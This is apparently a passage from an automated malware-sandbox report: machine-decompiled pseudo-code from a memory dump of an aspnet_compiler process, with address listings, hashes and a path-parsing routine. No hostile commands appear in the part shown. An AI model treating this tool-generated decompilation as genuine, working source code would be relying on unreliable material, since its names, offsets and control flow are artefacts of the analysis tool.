                          														 *((short*)(_t454 + 6)) = _t385;
                          														 *(_t454 + 4) = 0;
                          														asm("movsd");
                          														asm("movsd");
                          														asm("movsd");
                          														asm("movsd");
                          														_t327 = 1;
                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                          														_t479 = 0x68;
                          														 *(_t528 - 0x78) = _t479;
                          													}
                          													__eflags =  *(_t528 - 0x79) - _t327;
                          													if( *(_t528 - 0x79) == _t327) {
                          														_t524 = _t479 + _t427;
                          														_t508 =  *(_t528 - 0x8c);
                          														 *_t524 = _t508;
                          														_t373 = 2;
                          														 *((short*)(_t524 + 2)) = _t373;
                          														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                          														 *((short*)(_t524 + 4)) = 0;
                          														_t167 = _t524 + 8; // 0x8
                          														E0143F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                          														_t529 = _t529 + 0xc;
                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                          														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                          														 *(_t528 - 0x78) = _t479;
                          														_t380 =  *(_t528 - 0x80);
                          														__eflags = _t380;
                          														if(_t380 != 0) {
                          															_t173 = _t380 + 4;
                          															 *_t173 =  *(_t380 + 4) | 1;
                          															__eflags =  *_t173;
                          														}
                          														_t454 = _t524;
                          														 *(_t528 - 0x80) = _t454;
                          														_t327 = 1;
                          														__eflags = 1;
                          													}
                          													__eflags =  *(_t528 - 0xd4);
                          													if( *(_t528 - 0xd4) == 0) {
                          														_t505 =  *(_t528 - 0x80);
                          													} else {
                          														_t505 = _t479 + _t427;
                          														_t523 = 0x10;
                          														 *_t505 = _t523;
                          														_t367 = 3;
                          														 *((short*)(_t505 + 2)) = _t367;
                          														_t368 = 4;
                          														 *((short*)(_t505 + 6)) = _t368;
                          														 *(_t505 + 4) = 0;
                          														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                          														_t327 = 1;
                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                          														_t479 = _t479 + _t523;
                          														 *(_t528 - 0x78) = _t479;
                          														__eflags = _t454;
                          														if(_t454 != 0) {
                          															_t186 = _t454 + 4;
                          															 *_t186 =  *(_t454 + 4) | 1;
                          															__eflags =  *_t186;
                          														}
                          														 *(_t528 - 0x80) = _t505;
                          													}
                          													__eflags =  *(_t528 - 0x7a) - _t327;
                          													if( *(_t528 - 0x7a) == _t327) {
                          														 *(_t528 - 0xd4) = _t479 + _t427;
                          														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                          														E0143F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                          														_t529 = _t529 + 0xc;
                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                          														_t479 =  *(_t528 - 0x78) + _t522;
                          														 *(_t528 - 0x78) = _t479;
                          														__eflags = _t505;
                          														if(_t505 != 0) {
                          															_t199 = _t505 + 4;
                          															 *_t199 =  *(_t505 + 4) | 1;
                          															__eflags =  *_t199;
                          														}
                          														_t505 =  *(_t528 - 0xd4);
                          														 *(_t528 - 0x80) = _t505;
                          													}
                          													__eflags =  *(_t528 - 0xa8);
                          													if( *(_t528 - 0xa8) != 0) {
                          														_t356 = _t479 + _t427;
                          														 *(_t528 - 0xd4) = _t356;
                          														_t462 =  *(_t528 - 0xac);
                          														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                          														_t485 = 0xc;
                          														 *((short*)(_t356 + 2)) = _t485;
                          														 *(_t356 + 6) = _t462;
                          														 *((short*)(_t356 + 4)) = 0;
                          														_t211 = _t356 + 8; // 0x9
                          														E0143F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                          														E0143FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                          														_t529 = _t529 + 0x18;
                          														_t427 =  *(_t528 - 0x88);
                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                          														_t505 =  *(_t528 - 0xd4);
                          														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                          														 *(_t528 - 0x78) = _t479;
                          														_t362 =  *(_t528 - 0x80);
                          														__eflags = _t362;
                          														if(_t362 != 0) {
                          															_t222 = _t362 + 4;
                          															 *_t222 =  *(_t362 + 4) | 1;
                          															__eflags =  *_t222;
                          														}
                          													}
                          													__eflags =  *(_t528 - 0xb0);
                          													if( *(_t528 - 0xb0) != 0) {
                          														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                          														_t458 = 0xb;
                          														 *((short*)(_t479 + _t427 + 2)) = _t458;
                          														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                          														 *((short*)(_t427 + 4 + _t479)) = 0;
                          														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                          														E0143FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                          														_t529 = _t529 + 0xc;
                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                          														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                          														 *(_t528 - 0x78) = _t479;
                          														__eflags = _t505;
                          														if(_t505 != 0) {
                          															_t241 = _t505 + 4;
                          															 *_t241 =  *(_t505 + 4) | 1;
                          															__eflags =  *_t241;
                          														}
                          													}
                          													_t328 =  *(_t528 + 0x1c);
                          													__eflags = _t328;
                          													if(_t328 == 0) {
                          														L87:
                          														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                          														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                          														_t455 =  *(_t528 - 0xdc);
                          														 *(_t427 + 0x14) = _t455;
                          														_t480 =  *(_t528 - 0xa0);
                          														_t517 = 3;
                          														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                          														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                          															asm("rdtsc");
                          															 *(_t427 + 0x3c) = _t480;
                          														} else {
                          															 *(_t427 + 0x3c) = _t455;
                          														}
                          														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                          														_t456 =  *[fs:0x18];
                          														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                          														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                          														_t427 = 0;
                          														__eflags = 0;
                          														_t511 = 0x18;
                          														goto L91;
                          													} else {
                          														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                          														__eflags = _t519;
                          														 *(_t528 - 0x8c) = _t328;
                          														do {
                          															_t506 =  *((intOrPtr*)(_t519 - 4));
                          															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                          															 *(_t528 - 0xd4) =  *(_t519 - 8);
                          															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                          															__eflags =  *(_t333 + 0x36) & 0x00004000;
                          															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                          																_t334 =  *_t519;
                          															} else {
                          																_t334 = 0;
                          															}
                          															_t336 = _t334 & 0x000000ff;
                          															__eflags = _t336;
                          															_t427 =  *(_t528 - 0x88);
                          															if(_t336 == 0) {
                          																_t481 = _t479 + _t506;
                          																__eflags = _t481;
                          																 *(_t528 - 0x78) = _t481;
                          																E0143F3E0(_t479 + _t427, _t457, _t506);
                          																_t529 = _t529 + 0xc;
                          															} else {
                          																_t340 = _t336 - 1;
                          																__eflags = _t340;
                          																if(_t340 == 0) {
                          																	E0143F3E0( *(_t528 - 0xb8), _t457, _t506);
                          																	_t529 = _t529 + 0xc;
                          																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                          																} else {
                          																	__eflags = _t340 == 0;
                          																	if(_t340 == 0) {
                          																		__eflags = _t506 - 8;
                          																		if(_t506 == 8) {
                          																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                          																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                          																		}
                          																	}
                          																}
                          															}
                          															_t339 = 0x10;
                          															_t519 = _t519 + _t339;
                          															_t263 = _t528 - 0x8c;
                          															 *_t263 =  *(_t528 - 0x8c) - 1;
                          															__eflags =  *_t263;
                          															_t479 =  *(_t528 - 0x78);
                          														} while ( *_t263 != 0);
                          														goto L87;
                          													}
                          												}
                          											} else {
                          												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                          												 *(_t528 - 0xa2) = _t392;
                          												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                          												__eflags = _t469;
                          												while(1) {
                          													 *(_t528 - 0xe4) = _t511;
                          													__eflags = _t392;
                          													_t393 = _t427;
                          													if(_t392 != 0) {
                          														_t393 =  *((intOrPtr*)(_t469 + 4));
                          													}
                          													_t395 = (_t393 & 0x000000ff) - _t427;
                          													__eflags = _t395;
                          													if(_t395 == 0) {
                          														_t511 = _t511 +  *_t469;
                          														__eflags = _t511;
                          													} else {
                          														_t398 = _t395 - 1;
                          														__eflags = _t398;
                          														if(_t398 == 0) {
                          															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                          															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                          														} else {
                          															__eflags = _t398 == 1;
                          															if(_t398 == 1) {
                          																 *(_t528 - 0xa8) =  *(_t469 - 8);
                          																_t402 =  *_t469 & 0x0000ffff;
                          																 *(_t528 - 0xac) = _t402;
                          																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                          															}
                          														}
                          													}
                          													__eflags = _t511 -  *(_t528 - 0xe4);
                          													if(_t511 <  *(_t528 - 0xe4)) {
                          														break;
                          													}
                          													_t397 =  *(_t528 - 0x88) + 1;
                          													 *(_t528 - 0x88) = _t397;
                          													_t469 = _t469 + 0x10;
                          													__eflags = _t397 -  *(_t528 + 0x1c);
                          													_t392 =  *(_t528 - 0xa2);
                          													if(_t397 <  *(_t528 + 0x1c)) {
                          														continue;
                          													}
                          													goto L45;
                          												}
                          												_t475 = 0x216;
                          												 *(_t528 - 0x74) = 0x216;
                          												goto L45;
                          											}
                          										} else {
                          											asm("lock dec dword [eax+ecx*8+0x4]");
                          											goto L16;
                          										}
                          									}
                          									_t491 = E014C4CAB(_t306, _t528 - 0xa4);
                          									 *(_t528 - 0x74) = _t491;
                          									__eflags = _t491;
                          									if(_t491 != 0) {
                          										goto L91;
                          									} else {
                          										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                          										goto L20;
                          									}
                          								}
                          								L16:
                          								 *(_t528 - 0x74) = 0x1069;
                          								L93:
                          								_t298 =  *(_t528 - 0xd0) + 1;
                          								 *(_t528 - 0xd0) = _t298;
                          								_t474 = _t474 + _t511;
                          								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                          								_t494 = 4;
                          								__eflags = _t298 - _t494;
                          								if(_t298 >= _t494) {
                          									goto L100;
                          								}
                          								_t494 =  *(_t528 - 0xcc);
                          								_t435 = _t298;
                          								continue;
                          							}
                          							__eflags = _t494[2] | _t494[3];
                          							if((_t494[2] | _t494[3]) == 0) {
                          								goto L15;
                          							}
                          							goto L12;
                          						}
                          						__eflags = _t301;
                          						if(_t301 != 0) {
                          							goto L92;
                          						}
                          						goto L10;
                          						L92:
                          						goto L93;
                          					}
                          				} else {
                          					_push(0x57);
                          					L101:
                          					return E0144D130(_t427, _t494, _t511);
                          				}
                          			}










































































                          0x014c5ba5
                          0x014c5baa
                          0x014c5baf
                          0x014c5bb4
                          0x014c5bb6
                          0x014c5bbc
                          0x014c5bbe
                          0x014c5bc4
                          0x014c5bcd
                          0x014c5bd3
                          0x014c5bd6
                          0x014c5bdc
                          0x014c5be0
                          0x014c5be3
                          0x014c5beb
                          0x014c5bf2
                          0x014c5bf8
                          0x014c5bfe
                          0x014c5c04
                          0x014c5c0e
                          0x014c5c18
                          0x014c5c1f
                          0x014c5c25
                          0x014c5c2a
                          0x014c5c2c
                          0x014c5c32
                          0x014c5c3a
                          0x014c5c3f
                          0x014c5c42
                          0x014c5c48
                          0x014c5c5b
                          0x014c5c5b
                          0x014c5c2c
                          0x014c5cb7
                          0x014c5cb9
                          0x014c5cbf
                          0x014c5cc2
                          0x014c5cca
                          0x014c5ccb
                          0x014c5ccb
                          0x014c5cd1
                          0x014c5cd7
                          0x014c5cda
                          0x014c5ce1
                          0x014c5ce4
                          0x014c5ce7
                          0x014c5ced
                          0x014c5cf3
                          0x014c5cf9
                          0x014c5cff
                          0x014c5d08
                          0x014c5d0a
                          0x014c5d0e
                          0x014c5d10
                          0x00000000
                          0x00000000
                          0x014c5d16
                          0x014c5d1a
                          0x00000000
                          0x00000000
                          0x014c5d20
                          0x014c5d22
                          0x014c5d25
                          0x014c5d2f
                          0x014c5d2f
                          0x014c5d33
                          0x014c5d3d
                          0x014c5d49
                          0x014c5d4b
                          0x00000000
                          0x00000000
                          0x014c5d5a
                          0x014c5d5d
                          0x014c5d60
                          0x00000000
                          0x00000000
                          0x014c5d66
                          0x014c5d69
                          0x00000000
                          0x00000000
                          0x014c5d6f
                          0x014c5d6f
                          0x014c5d73
                          0x014c5d79
                          0x014c5d7f
                          0x014c5d86
                          0x014c5d95
                          0x014c5d98
                          0x014c5dba
                          0x014c5dcb
                          0x014c5dce
                          0x014c5dd3
                          0x014c5dd6
                          0x014c5dd8
                          0x014c5de6
                          0x014c5dec
                          0x014c5dee
                          0x014c5df1
                          0x014c5df3
                          0x014c635a
                          0x014c635a
                          0x00000000
                          0x014c635a
                          0x014c5dfe
                          0x014c5e02
                          0x014c5e05
                          0x014c5e07
                          0x014c5e10
                          0x014c5e13
                          0x014c5e1b
                          0x014c5e1c
                          0x014c5e21
                          0x014c5e22
                          0x014c5e23
                          0x014c5e25
                          0x014c5e2a
                          0x014c5e2c
                          0x014c5e2e
                          0x014c5e36
                          0x014c5e39
                          0x014c5e42
                          0x014c5e47
                          0x014c5e4d
                          0x014c5e54
                          0x014c5e54
                          0x014c5e54
                          0x014c5e2e
                          0x014c5e5c
                          0x014c5e5f
                          0x014c5e62
                          0x014c5e64
                          0x014c5e6b
                          0x014c5e70
                          0x014c5e7a
                          0x014c5e7a
                          0x014c5e7a
                          0x014c5e6b
                          0x014c5e7e
                          0x014c5e7f
                          0x014c5e7f
                          0x014c5e81
                          0x014c5e87
                          0x014c5e8b
                          0x014c5e8c
                          0x014c5e8c
                          0x014c5e8c
                          0x014c5e9a
                          0x014c5e9c
                          0x014c5ea2
                          0x014c5ea6
                          0x014c5f50
                          0x014c5f50
                          0x014c5f57
                          0x014c5f66
                          0x014c5f66
                          0x014c5f66
                          0x014c5f68
                          0x014c5f6a
                          0x014c63d0
                          0x00000000
                          0x014c5f70
                          0x014c5f70
                          0x014c5f91
                          0x014c5f9c
                          0x014c5f9e
                          0x014c5fa4
                          0x014c5fa6
                          0x014c638c
                          0x014c6392
                          0x014c63a1
                          0x014c63a7
                          0x014c63af
                          0x014c63af
                          0x014c63bd
                          0x014c63d8
                          0x00000000
                          0x014c63d8
                          0x014c5fac
                          0x014c5fb2
                          0x014c5fb4
                          0x014c5fbd
                          0x014c5fc6
                          0x014c5fce
                          0x014c5fd4
                          0x014c5fdc
                          0x014c5fec
                          0x014c5fed
                          0x014c5fee
                          0x014c5fef
                          0x014c5ff9
                          0x014c5ffa
                          0x014c5ffb
                          0x014c5ffc
                          0x014c6000
                          0x014c6004
                          0x014c6012
                          0x014c6012
                          0x014c6018
                          0x014c6019
                          0x014c601a
                          0x014c601b
                          0x014c601c
                          0x014c6020
                          0x014c6059
                          0x014c605c
                          0x014c6061
                          0x014c6061
                          0x014c6022
                          0x014c6022
                          0x014c6022
                          0x014c6025
                          0x014c602a
                          0x014c602b
                          0x014c6031
                          0x014c6037
                          0x014c6038
                          0x014c603e
                          0x014c6048
                          0x014c6049
                          0x014c604a
                          0x014c604b
                          0x014c604c
                          0x014c604d
                          0x014c6053
                          0x014c6054
                          0x014c6054
                          0x014c6062
                          0x014c6065
                          0x014c6067
                          0x014c606a
                          0x014c6070
                          0x014c6075
                          0x014c6076
                          0x014c6081
                          0x014c6087
                          0x014c6095
                          0x014c6099
                          0x014c609e
                          0x014c60a4
                          0x014c60ae
                          0x014c60b0
                          0x014c60b3
                          0x014c60b6
                          0x014c60b8
                          0x014c60ba
                          0x014c60ba
                          0x014c60ba
                          0x014c60ba
                          0x014c60be
                          0x014c60c0
                          0x014c60c5
                          0x014c60c5
                          0x014c60c5
                          0x014c60c6
                          0x014c60cd
                          0x014c6114
                          0x014c60cf
                          0x014c60cf
                          0x014c60d4
                          0x014c60d5
                          0x014c60da
                          0x014c60db
                          0x014c60e1
                          0x014c60e2
                          0x014c60e8
                          0x014c60f8
                          0x014c60fd
                          0x014c60fe
                          0x014c6102
                          0x014c6104
                          0x014c6107
                          0x014c6109
                          0x014c610b
                          0x014c610b
                          0x014c610b
                          0x014c610b
                          0x014c610f
                          0x014c610f
                          0x014c6117
                          0x014c611a
                          0x014c611f
                          0x014c6125
                          0x014c6134
                          0x014c6139
                          0x014c613f
                          0x014c6146
                          0x014c6148
                          0x014c614b
                          0x014c614d
                          0x014c614f
                          0x014c614f
                          0x014c614f
                          0x014c614f
                          0x014c6153
                          0x014c6159
                          0x014c6159
                          0x014c615c
                          0x014c6163
                          0x014c6169
                          0x014c616c
                          0x014c6172
                          0x014c6181
                          0x014c6186
                          0x014c6187
                          0x014c618b
                          0x014c6191
                          0x014c6195
                          0x014c61a3
                          0x014c61bb
                          0x014c61c0
                          0x014c61c3
                          0x014c61cc
                          0x014c61d0
                          0x014c61dc
                          0x014c61de
                          0x014c61e1
                          0x014c61e4
                          0x014c61e6
                          0x014c61e8
                          0x014c61e8
                          0x014c61e8
                          0x014c61e8
                          0x014c61e6
                          0x014c61ec
                          0x014c61f3
                          0x014c6203
                          0x014c6209
                          0x014c620a
                          0x014c6216
                          0x014c621d
                          0x014c6227
                          0x014c6241
                          0x014c6246
                          0x014c624c
                          0x014c6257
                          0x014c6259
                          0x014c625c
                          0x014c625e
                          0x014c6260
                          0x014c6260
                          0x014c6260
                          0x014c6260
                          0x014c625e
                          0x014c6264
                          0x014c6267
                          0x014c6269
                          0x014c6315
                          0x014c6315
                          0x014c631b
                          0x014c631e
                          0x014c6324
                          0x014c6327
                          0x014c632f
                          0x014c6330
                          0x014c6333
                          0x014c633a
                          0x014c633c
                          0x014c6335
                          0x014c6335
                          0x014c6335
                          0x014c633f
                          0x014c6342
                          0x014c634c
                          0x014c6352
                          0x014c6355
                          0x014c6355
                          0x014c6359
                          0x00000000
                          0x014c626f
                          0x014c6275
                          0x014c6275
                          0x014c6278
                          0x014c627e
                          0x014c627e
                          0x014c6281
                          0x014c6287
                          0x014c628d
                          0x014c6298
                          0x014c629c
                          0x014c62a2
                          0x014c629e
                          0x014c629e
                          0x014c629e
                          0x014c62a7
                          0x014c62a7
                          0x014c62aa
                          0x014c62b0
                          0x014c62f0
                          0x014c62f0
                          0x014c62f2
                          0x014c62f8
                          0x014c62fd
                          0x014c62b2
                          0x014c62b2
                          0x014c62b2
                          0x014c62b5
                          0x014c62dd
                          0x014c62e2
                          0x014c62e5
                          0x014c62b7
                          0x014c62b8
                          0x014c62bb
                          0x014c62bd
                          0x014c62c0
                          0x014c62c4
                          0x014c62cd
                          0x014c62cd
                          0x014c62c0
                          0x014c62bb
                          0x014c62b5
                          0x014c6302
                          0x014c6303
                          0x014c6305
                          0x014c6305
                          0x014c6305
                          0x014c630c
                          0x014c630c
                          0x00000000
                          0x014c627e
                          0x014c6269
                          0x014c5eac
                          0x014c5ebb
                          0x014c5ebe
                          0x014c5ecb
                          0x014c5ecb
                          0x014c5ece
                          0x014c5ece
                          0x014c5ed4
                          0x014c5ed7
                          0x014c5ed9
                          0x014c5edb
                          0x014c5edb
                          0x014c5ee1
                          0x014c5ee1
                          0x014c5ee3
                          0x014c5f20
                          0x014c5f20
                          0x014c5ee5
                          0x014c5ee5
                          0x014c5ee5
                          0x014c5ee8
                          0x014c5f11
                          0x014c5f18
                          0x014c5eea
                          0x014c5eea
                          0x014c5eed
                          0x014c5ef2
                          0x014c5ef8
                          0x014c5efb
                          0x014c5f0a
                          0x014c5f0a
                          0x014c5eed
                          0x014c5ee8
                          0x014c5f22
                          0x014c5f28
                          0x00000000
                          0x00000000
                          0x014c5f30
                          0x014c5f31
                          0x014c5f37
                          0x014c5f3a
                          0x014c5f3d
                          0x014c5f44
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014c5f46
                          0x014c5f48
                          0x014c5f4d
                          0x00000000
                          0x014c5f4d
                          0x014c5dda
                          0x014c5ddf
                          0x00000000
                          0x014c5ddf
                          0x014c5dd8
                          0x014c5da7
                          0x014c5da9
                          0x014c5dac
                          0x014c5dae
                          0x00000000
                          0x014c5db4
                          0x014c5db4
                          0x00000000
                          0x014c5db4
                          0x014c5dae
                          0x014c5d88
                          0x014c5d8d
                          0x014c6363
                          0x014c6369
                          0x014c636a
                          0x014c6370
                          0x014c6372
                          0x014c637a
                          0x014c637b
                          0x014c637d
                          0x00000000
                          0x00000000
                          0x014c637f
                          0x014c6385
                          0x00000000
                          0x014c6385
                          0x014c5d38
                          0x014c5d3b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014c5d3b
                          0x014c5d27
                          0x014c5d29
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014c6360
                          0x00000000
                          0x014c6360
                          0x014c5c10
                          0x014c5c10
                          0x014c63da
                          0x014c63e5
                          0x014c63e5

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 99aa2e774bfe46e2b393afb8b3c7b516f51b8631475b7f2c6373a26677f70265
                          • Instruction ID: 0d0329cd9a7c14c4d263ccdf7864ef25b7fe4dc204f9acf68d5083307b35f56a
                          • Opcode Fuzzy Hash: 99aa2e774bfe46e2b393afb8b3c7b516f51b8631475b7f2c6373a26677f70265
                          • Instruction Fuzzy Hash: 46425E75A00219CFDB64CF68C840BAABBB1FF45704F1581AED94DAB362D734A985CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E01414120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                          				signed int _v8;
                          				void* _v20;
                          				signed int _v24;
                          				char _v532;
                          				char _v540;
                          				signed short _v544;
                          				signed int _v548;
                          				signed short* _v552;
                          				signed short _v556;
                          				signed short* _v560;
                          				signed short* _v564;
                          				signed short* _v568;
                          				void* _v570;
                          				signed short* _v572;
                          				signed short _v576;
                          				signed int _v580;
                          				char _v581;
                          				void* _v584;
                          				unsigned int _v588;
                          				signed short* _v592;
                          				void* _v597;
                          				void* _v600;
                          				void* _v604;
                          				void* _v609;
                          				void* _v616;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				unsigned int _t161;
                          				signed int _t162;
                          				unsigned int _t163;
                          				void* _t169;
                          				signed short _t173;
                          				signed short _t177;
                          				signed short _t181;
                          				unsigned int _t182;
                          				signed int _t185;
                          				signed int _t213;
                          				signed int _t225;
                          				short _t233;
                          				signed char _t234;
                          				signed int _t242;
                          				signed int _t243;
                          				signed int _t244;
                          				signed int _t245;
                          				signed int _t250;
                          				void* _t251;
                          				signed short* _t254;
                          				void* _t255;
                          				signed int _t256;
                          				void* _t257;
                          				signed short* _t260;
                          				signed short _t265;
                          				signed short* _t269;
                          				signed short _t271;
                          				signed short** _t272;
                          				signed short* _t275;
                          				signed short _t282;
                          				signed short _t283;
                          				signed short _t290;
                          				signed short _t299;
                          				signed short _t307;
                          				signed int _t308;
                          				signed short _t311;
                          				signed short* _t315;
                          				signed short _t316;
                          				void* _t317;
                          				void* _t319;
                          				signed short* _t321;
                          				void* _t322;
                          				void* _t323;
                          				unsigned int _t324;
                          				signed int _t325;
                          				void* _t326;
                          				signed int _t327;
                          				signed int _t329;
                          
                          				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                          				_v8 =  *0x14ed360 ^ _t329;
                          				_t157 = _a8;
                          				_t321 = _a4;
                          				_t315 = __edx;
                          				_v548 = __ecx;
                          				_t305 = _a20;
                          				_v560 = _a12;
                          				_t260 = _a16;
                          				_v564 = __edx;
                          				_v580 = _a8;
                          				_v572 = _t260;
                          				_v544 = _a20;
                          				if( *__edx <= 8) {
                          					L3:
                          					if(_t260 != 0) {
                          						 *_t260 = 0;
                          					}
                          					_t254 =  &_v532;
                          					_v588 = 0x208;
                          					if((_v548 & 0x00000001) != 0) {
                          						_v556 =  *_t315;
                          						_v552 = _t315[2];
                          						_t161 = E0142F232( &_v556);
                          						_t316 = _v556;
                          						_v540 = _t161;
                          						goto L17;
                          					} else {
                          						_t306 = 0x208;
                          						_t298 = _t315;
                          						_t316 = E01416E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                          						if(_t316 == 0) {
                          							L68:
                          							_t322 = 0xc0000033;
                          							goto L39;
                          						} else {
                          							while(_v581 == 0) {
                          								_t233 = _v588;
                          								if(_t316 > _t233) {
                          									_t234 = _v548;
                          									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                          										_t254 = L01414620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                          										if(_t254 == 0) {
                          											_t169 = 0xc0000017;
                          										} else {
                          											_t298 = _v564;
                          											_v588 = _t316;
                          											_t306 = _t316;
                          											_t316 = E01416E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                          											if(_t316 != 0) {
                          												continue;
                          											} else {
                          												goto L68;
                          											}
                          										}
                          									} else {
                          										goto L90;
                          									}
                          								} else {
                          									_v556 = _t316;
                          									 *((short*)(_t329 + 0x32)) = _t233;
                          									_v552 = _t254;
                          									if(_t316 < 2) {
                          										L11:
                          										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                          											_t161 = 5;
                          										} else {
                          											if(_t316 < 6) {
                          												L87:
                          												_t161 = 3;
                          											} else {
                          												_t242 = _t254[2] & 0x0000ffff;
                          												if(_t242 != 0x5c) {
                          													if(_t242 == 0x2f) {
                          														goto L16;
                          													} else {
                          														goto L87;
                          													}
                          													goto L101;
                          												} else {
                          													L16:
                          													_t161 = 2;
                          												}
                          											}
                          										}
                          									} else {
                          										_t243 =  *_t254 & 0x0000ffff;
                          										if(_t243 == 0x5c || _t243 == 0x2f) {
                          											if(_t316 < 4) {
                          												L81:
                          												_t161 = 4;
                          												goto L17;
                          											} else {
                          												_t244 = _t254[1] & 0x0000ffff;
                          												if(_t244 != 0x5c) {
                          													if(_t244 == 0x2f) {
                          														goto L60;
                          													} else {
                          														goto L81;
                          													}
                          												} else {
                          													L60:
                          													if(_t316 < 6) {
                          														L83:
                          														_t161 = 1;
                          														goto L17;
                          													} else {
                          														_t245 = _t254[2] & 0x0000ffff;
                          														if(_t245 != 0x2e) {
                          															if(_t245 == 0x3f) {
                          																goto L62;
                          															} else {
                          																goto L83;
                          															}
                          														} else {
                          															L62:
                          															if(_t316 < 8) {
                          																L85:
                          																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                          																goto L17;
                          															} else {
                          																_t250 = _t254[3] & 0x0000ffff;
                          																if(_t250 != 0x5c) {
                          																	if(_t250 == 0x2f) {
                          																		goto L64;
                          																	} else {
                          																		goto L85;
                          																	}
                          																} else {
                          																	L64:
                          																	_t161 = 6;
                          																	goto L17;
                          																}
                          															}
                          														}
                          													}
                          												}
                          											}
                          											goto L101;
                          										} else {
                          											goto L11;
                          										}
                          									}
                          									L17:
                          									if(_t161 != 2) {
                          										_t162 = _t161 - 1;
                          										if(_t162 > 5) {
                          											goto L18;
                          										} else {
                          											switch( *((intOrPtr*)(_t162 * 4 +  &M014145F8))) {
                          												case 0:
                          													_v568 = 0x13d1078;
                          													__eax = 2;
                          													goto L20;
                          												case 1:
                          													goto L18;
                          												case 2:
                          													_t163 = 4;
                          													goto L19;
                          											}
                          										}
                          										goto L41;
                          									} else {
                          										L18:
                          										_t163 = 0;
                          										L19:
                          										_v568 = 0x13d11c4;
                          									}
                          									L20:
                          									_v588 = _t163;
                          									_v564 = _t163 + _t163;
                          									_t306 =  *_v568 & 0x0000ffff;
                          									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                          									_v576 = _t265;
                          									if(_t265 > 0xfffe) {
                          										L90:
                          										_t322 = 0xc0000106;
                          									} else {
                          										if(_t321 != 0) {
                          											if(_t265 > (_t321[1] & 0x0000ffff)) {
                          												if(_v580 != 0) {
                          													goto L23;
                          												} else {
                          													_t322 = 0xc0000106;
                          													goto L39;
                          												}
                          											} else {
                          												_t177 = _t306;
                          												goto L25;
                          											}
                          											goto L101;
                          										} else {
                          											if(_v580 == _t321) {
                          												_t322 = 0xc000000d;
                          											} else {
                          												L23:
                          												_t173 = L01414620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                          												_t269 = _v592;
                          												_t269[2] = _t173;
                          												if(_t173 == 0) {
                          													_t322 = 0xc0000017;
                          												} else {
                          													_t316 = _v556;
                          													 *_t269 = 0;
                          													_t321 = _t269;
                          													_t269[1] = _v576;
